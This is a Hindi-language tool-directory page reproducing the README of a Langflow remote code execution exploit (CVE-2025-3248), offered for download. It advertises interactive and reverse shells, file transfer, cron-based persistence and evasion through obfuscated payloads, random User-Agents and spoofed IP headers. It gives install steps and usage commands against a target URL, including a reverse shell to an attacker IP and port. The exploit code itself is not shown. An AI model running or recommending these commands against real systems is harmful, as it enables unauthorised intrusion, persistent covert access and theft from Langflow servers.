Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
langflow-rce-exploit — Langflow के लिए दूरस्थ कोड निष्पादन शोषण (CVE-2025-3248) - [ S4Tech द्वारा ] | Kitploit
उपकरण/GitHubGitHub/0-d3y/langflow-rce-exploit
विशेषाधिकार वृद्धिस्थायित्व तंत्रभेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
7151 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

Langflow के लिए दूरस्थ कोड निष्पादन शोषण (CVE-2025-3248) - [ S4Tech द्वारा ]

रिपॉजिटरी देखें

Langflow RCE Exploit (CVE-2025-3248)

Python Version License Platform

लैंगफ्लो के लिए दूरस्थ कोड निष्पादन शोषण (CVE-2025-3248)

विशेषताएँ

  • स्वचालित भेद्यता पहचान
  • कई शोषण मोड:
    • इंटरैक्टिव शेल
    • एकल कमांड निष्पादन
    • रिवर्स शेल कनेक्शन
  • फ़ाइल अपलोड क्षमता
  • रंगीन उपयोगकर्ता इंटरफ़ेस
  • कई रिवर्स शेल विधियाँ
  • कमांड इतिहास स्थिरता

📌 परिवर्तन लॉग (v2.0)

✨ नई सुविधाएँ:

  • उन्नत पेलोड प्रणाली 5 निष्पादन विधियों के साथ
  • फ़ाइल अपलोड/डाउनलोड Base64 एन्कोडिंग के साथ
  • स्थिरता क्रॉन जॉब्स के माध्यम से (persist कमांड)
  • इंटरैक्टिव शेल उन्नयन:
    • upload local_path remote_path
    • download remote_path local_path
    • टर्मिनल के लिए clear कमांड

🛡️ सुरक्षा संवर्द्धन:

  • स्वचालित पेलोड अस्पष्टीकरण (Base64 + यादृच्छिक विविधताएँ)
  • प्रति अनुरोध हेडर रोटेशन:
    • यादृच्छिक User-Agent
    • स्पूफ़ किए गए X-Forwarded-For IP पते
  • HTTPS बाइपास (स्व-हस्ताक्षरित प्रमाणपत्र समर्थन)
  • कोई रीडायरेक्ट नहीं पहचान से बचने के लिए

⚡ तकनीकी सुधार:

  • बहु-चरण भेद्यता सत्यापन
  • अस्थिर कनेक्शन के लिए उन्नत त्रुटि प्रबंधन
  • पूर्ण सत्र लॉगिंग exploit_log.txt में
  • कमांड इतिहास स्थिरता (.langflow_shell_history)

📊 संस्करण तुलना:

🐛 बग फिक्स:

  • HTTPS कनेक्शन समस्याएँ ठीक की गईं
  • कमांड में विशेष वर्णों के प्रबंधन में सुधार किया गया
  • रिवर्स शेल विश्वसनीयता को स्थिर किया गया

आवश्यकताएँ

  • Python 3.6 या नया
  • आवश्यक पुस्तकालय:
    • requests
    • colorama
    • readline

स्थापना

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

उपयोग

root@kitploit:~
python exploit.py <URL> [options]

उपलब्ध विकल्प:

उदाहरण:

  1. भेद्यता जांचें:
root@kitploit:~
python exploit.py http://target.com
  1. इंटरैक्टिव शेल शुरू करें:
root@kitploit:~
python exploit.py http://target.com --shell
  1. एकल कमांड निष्पादित करें:
root@kitploit:~
python exploit.py http://target.com --command "whoami"
  1. रिवर्स शेल लॉन्च करें:
root@kitploit:~
python exploit.py http://target.com --reverse 192.168.1.100 4444

स्क्रीनशॉट

Image.png)

चेतावनी

⚠️ यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
⚠️ उन प्रणालियों के विरुद्ध अनधिकृत उपयोग जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण की अनुमति नहीं है, अवैध है।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

लेखक

  • Mr.SaMi
    Twitter
    Instagram

योगदान

पुल अनुरोधों का स्वागत है। बड़े बदलावों के लिए, कृपया पहले एक मुद्दा खोलें ताकि आप जो बदलना चाहते हैं उस पर चर्चा कर सकें।

टूल डाउनलोड करें
Featurev1.0v2.0
पेलोड विधियाँ15
फ़ाइल स्थानांतरण❌ समर्थित नहीं✅ समर्थित
स्थिरता❌✅
छिपाव स्तरबुनियादीउन्नत
सत्र लॉगिंग❌✅
OptionDescription
--shellइंटरैक्टिव शेल शुरू करें
--reverse IP PORTनिर्दिष्ट IP:PORT पर रिवर्स शेल लॉन्च करें
--command CMDएकल कमांड निष्पादित करें
--verboseविस्तृत आउटपुट सक्षम करें
--timeout SECअनुरोध टाइमआउट सेट करें (डिफ़ॉल्ट: 10s)